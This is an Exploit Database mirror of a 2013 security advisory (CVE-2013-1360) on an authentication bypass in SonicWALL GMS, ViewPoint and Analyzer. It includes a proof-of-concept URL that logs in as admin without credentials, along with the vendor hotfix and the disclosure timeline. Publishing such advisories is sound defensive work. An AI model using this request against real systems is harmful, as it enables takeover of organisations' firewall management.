SonicWALL GMS/Viewpoint/Analyzer – Authentication Bypass

• Exploit Database
• 12 阅读

• 作者： Nikolas Sotiriu
  日期： 2013-01-18
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/24203/

• -------------------------- NSOADV-2013-002 ---------------------------
  
  SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)
  ______________________________________________________________________
  ______________________________________________________________________
  
   111101111
  11111 00110 00110001111
   111111 01 01 1 11111011111111
  111110 11 01 0 11 1 1111011001
   11111111101 1 11 011011111111101111
   10010 1 10 11 0 10 11 11111111 111 111001
   111111111 0 10 1111 0 11 11 111111111 1 1101 10
  00111 0 0 11 00 0 1110 1 1011111111111 1111111 11100
   10111111 0 01 01 1 111110 11 111111111111111110000011
   0111111110 0110 1110 1 0 11101111111111111011 1110000
   01111 0 10 1110 1 011111 1 111111111111111111111101 01
   01110 0 10 111110 110 0 11101111111111111111101111101
  111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111
  111110110 10 0111110 1 0 0 1111111111111111111111111 110
  111 11111 11 111 1 10011 101111111111011111111 0 1100
   111 10110 101011110010 11111111111111111111111 11 0011100
   11 10 001100 0001111111111111111111 10 11 11110
  11110 0010000001 10 11111101010001 11111111
  1110101011 1000000100 1110000001101 0
  0110 111011011 0110 10001101 11110
  1011 1 10 101 00000101 00
   1010 1110011 110110
  1101010110 101 11110
  110000011
  111
  ______________________________________________________________________
  ______________________________________________________________________
  
  Title:SonicWALL GMS/Viewpoint/Analyzer
  Authentication Bypass (/sgms/)
  Severity: Critical
  CVE-ID: CVE-2013-1360
  CVSS Base Score:9
   Impact:8.5
   Exploitability:10
   CVSS2 Vector:AV:N/AC:L/Au:N/C:P/I:P/A:C
  Advisory ID:NSOADV-2013-002
  Found Date: 2012-04-26
  Date Reported:2012-12-13
  Release Date: 2013-01-17
  Author: Nikolas Sotiriu
  Website:http://sotiriu.de
  Twitter:http://twitter.com/nsoresearch
  Mail: nso-research at sotiriu.de
  URL:http://sotiriu.de/adv/NSOADV-2013-002.txt
  Vendor: DELL SonicWALL (http://www.sonicwall.com/)
  Affected Products:GMS
  Analyzer
  UMA
  ViewPoint
  Affected Platforms: Windows/Linux
  Affected Versions:GMS/Analyzer/UMA 7.0.x
  GMS/ViewPoint/UMA 6.0.x
  GMS/ViewPoint/UMA 5.1.x
  GMS/ViewPoint 5.0.x
  GMS/ViewPoint 4.1.x
  Remote Exploitable: Yes
  Local Exploitable:No
  Patch Status: Vendor released a patch (See Solution)
  Discovered by:Nikolas Sotiriu
  
  
  
  Background:
  ===========
  
  The SonicWALL® Global Management System (GMS) provides organizations,
  distributed enterprises and service providers with a powerful and
  intuitive solution to centrally manage and rapidly deploy SonicWALL
  firewall, anti-spam, backup and recovery, and secure remote access
  solutions. Flexibly deployed as software, hardware, or a virtual
  appliance, SonicWALL GMS offers centralized real-time monitoring, and
  comprehensive policy and compliance reporting. For enterprise customers,
  SonicWALL GMS streamlines security policy management and appliance
  deployment, minimizing administration overhead. Service Providers can
  use GMS to simplify the security management of multiple clients and
  create additional revenue opportunities. For added redundancy and
  scalability, GMS can be deployed in a cluster configuration.
  
  (Product description from Website)
  
  
  
  Description:
  ============
  
  DELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that
  allows an unauthenticated, remote attacker to bypass the Web interface
  authentication offered by the affected product.
  
  The vulnerability is attributed to a broken session handling in the
  process of password change process of the web application.
  changing in the web application.
  
  An attacker may exploit this vulnerability by sending a specially
  crafted request to the SGMS Interface (/sgms/).
  
  The attacker gains full administrative access to the interface and
  full control over all managed appliances, which could lead to a full
  compromisation of the organisation.
  
  
  
  Proof of Concept :
  ==================
  
  Access the following URL to login to the sgms interface:
  
  http://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663
  83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092
  4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000
  00000000001
  
  If the Console is not directly shown, type any password you
  want in the change password dialog twice and hit submit to login.
  
  Maybe you need to access the following URL after this process:
  
  http://host/sgms/auth
  
  
  
  Solution:
  =========
  
  Install Hotfix 125076.77. (Download from www.mysonicwall.com)
  
  
  
  Disclosure Timeline:
  ====================
  
  2012-04-26: Vulnerability found
  2012-12-12: Sent the notification and disclosure policy and asked
  for a PGP Key (security@sonicwall.com)
  2012-12-13: Sent advisory, disclosure policy and planned disclosure
  date (2012-12-28) to vendor
  2012-12-18: SonicWALL analyzed the finding and wishes to delay the
  release to the 3. calendar week 2013.
  2012-12-18: Changed release date to 2013-01-17.
  2012-12-20: Patch is published
  2013-01-17: Release of this advisory